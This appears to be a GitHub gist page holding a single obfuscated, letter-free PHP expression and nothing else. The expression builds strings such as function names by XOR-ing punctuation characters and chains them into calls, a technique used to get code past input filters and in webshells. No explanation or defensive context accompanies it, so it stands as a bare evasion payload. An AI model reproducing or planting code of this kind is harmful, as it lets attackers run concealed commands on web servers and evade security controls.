')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^')'^'^'^'(')).(((((')'^'^'^','^'(').(')'^'^'^'.'^'(').('^'^',').('^'^'.'^','^'('))(((')'^'^'^','^'(').('^'^'.'^','^'(').('^'^',').(')'^'^'^','^'(').('^'^'.'^','^'(').('^'^','))('','.')).'')^'^'^',')))(((')'^'^'^','^'(')).(('.'^','^'('))))).'

image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment